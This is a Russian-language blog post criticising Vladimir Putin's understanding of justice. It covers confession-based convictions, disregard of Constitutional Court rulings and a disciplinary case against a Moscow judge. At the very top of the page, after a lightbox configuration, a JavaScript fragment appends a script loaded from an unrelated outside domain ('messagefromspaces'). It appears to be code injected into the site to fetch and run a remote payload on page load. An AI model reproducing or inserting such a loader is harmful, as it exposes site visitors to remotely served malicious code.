, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Путин не понимает сути и назначения правосудия

23 Янв

СМИ сообщают о том, что председателей судов освободят от административно-хозяйственной работы. Это, как полагает президент РФ Владимир Путин, позволит повысить качество российского правосудия http://rapsinews.ru/judicial_news/20180123/281720661.html

Любой выпускник юридического факультета обязан знать, что правосудие это вид государственной деятельности, осуществляемый с соблюдением особого порядка, закреплённого Конституцией и процессуальным законодательством.

Поэтому качество российского правосудия определяется тем, насколько судья подчиняется требованиям Конституции и порядку судопроизводства, а не успехами или недостатками председателя суда в административно-хозяйственной деятельности.

О том, что с правосудием в России большая беда, гаранту Конституции уже не раз сообщали сами судьи http://www.compronet.info/LettersToAuthorities/90/

Но улучшений не наблюдается.

За прошедшие шесть лет Путин, как гарант Конституции, так и не смог обеспечить каждому гарантированную судебную защиту его прав и свобод. Он не справился с пыточным судопроизводством, https://sobchakprotivvseh.ru/blog/4  которое  породило ежегодное осуждение около 700 тысяч подсудимых на одних только их  признательных показаниях.

В стране тысячи обвиняемых содержатся в следственных изоляторах, и суды не проверяют законность и обоснованность постановления следователя о привлечении в качестве обвиняемого. Тем самым не обеспечиваются не только требования Основного Закона страны, но и принципы уголовного судопроизводства, являющиеся требованиями к лицам, осуществляемым уголовное преследование и судьям.

На практике  не реализуется такое назначение уголовного судопроизводства, как защита личности от незаконного и необоснованного обвинения, осуждения, ограничения её прав и свобод (п.2 ч. 1 ст. 6 УПК РФ).

Вышестоящие судебные инстанции тысячами отменяют, как незаконные и необоснованные, решения и приговоры нижестоящих судов, но за такое «правосудие» никого не наказывают.

Не раз сам убеждался в том, что осуществляющие контроль над работой судей  квалификационные коллегии, в которых присутствуют и полномочные представители Путина, своими решениями не формируют подчинение судей требованиям Основного Закона страны и порядку судопроизводства.

Очень ярко характеризует неправосудность судебных решений пример с судьёй  Матюшенко.

После того, как  вынесенные в отношении М. судебные решения были отменены, и производство по уголовному делу прекращено за отсутствием в  деянии состава преступления, председатель Московского городского суда О.А. Егорова направила в квалификационную коллегию судей представление на судью Преображенского районного суда города Москвы А.В. Матюшенко. Поводом для возбуждения дисциплинарного производства послужило рассмотрение в апелляционном порядке уголовного дела в отношении гражданки М. (которая была признана виновной в совершении преступления, предусмотренного частью первой статьи 312 УК Российской Федерации, и приговорена к лишению свободы на срок один год и два месяца с отбыванием наказания в колонии-поселении).

В представлении указывалось, что А.В. Матюшенко не изучила должным образом материалы уголовного дела, не исследовала доводы апелляционных жалоб и представления, допустила ряд нарушений уголовно-процессуального законодательства и оставила приговор, вынесенный мировым судьей, без изменения, что повлекло незаконное и необоснованное осуждение М. к реальному лишению свободы.

Как практикующий 45 лет юрист могу утверждать, что подобное происходит по пяти  делам из десяти, что рассматривают в судах первой инстанции.

Судья А.В. Матюшенко не согласилась с такой оценкой её  работы, и дело дошло до Конституционного Суда РФ, http://www.garant.ru/products/ipo/prime/doc/58102755/   который в своём решении указал: Вынесение неправосудного судебного акта, хотя оно и не подпадает под признаки состава преступления, тем не менее, может свидетельствовать либо о  явной небрежности судьи, либо о его неспособности исполнять свои профессиональные обязанности, недопустимой при отправлении правосудия.

В стране ежегодно выносят тысячи неправосудных судебных решений и единичны случаи наказания за них. Верховный Суд РФ ни разу не обобщил и  не назвал причины вынесения неправосудных решений, не дал судьям рекомендаций, как избежать неправосудных решений.

Известно, что позиция Конституционного Суда РФ не может быть изменена даже принятием нового законодательства. Но, кто с позицией КС в России считается?

Так, в своих решениях КС неоднократно указывал, что положения ст. 7 УПК РФ не допускают отказ судов и иных правоприменительных органов и  должностных лиц от рассмотрения и оценки всех доводов заявлений, ходатайств или жалоб участников уголовного судопроизводства, а также произвольное отклонение или игнорирование доводов жалобы, без приведения фактических и правовых мотивов отказа в удовлетворении жалобы.

Но игнорирование этой правовой позиции КС происходит в  стране в огромных масштабах. Не раз по моим жалобам судьи кассационных инстанций выносили решения, игнорируя мои доводы и представленные доказательства.

Об отсутствии судебного надзора в России прямо свидетельствует то, что  судьи высшей судебной инстанции действуют вопреки требованиям Конституции РФ, федеральных законов, рекомендаций Верховного Суда РФ и правовой позиции Конституционного Суда РФ, толковать в  пользу обвиняемого не опровергнутые доводы защиты против обвинительных судебных решений.

Россия на 92 месте по верховенству права, и это уже кричит о главной причине всех наших экономических отставаний и бедственной жизни россиян.

Жаль, что гарантом Конституции может вновь стать Владимир Путин, который не понимает сути и назначения правосудия, который не знает, что права и свободы человека определяют смысл, содержание и применение законов, деятельность законодательной и исполнительной власти и обеспечиваются правосудием. Если нет правосудия, властвует ничем не  умеряемое самовластие. Неужели за два десятилетия россияне не нажились такой жизнью?

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.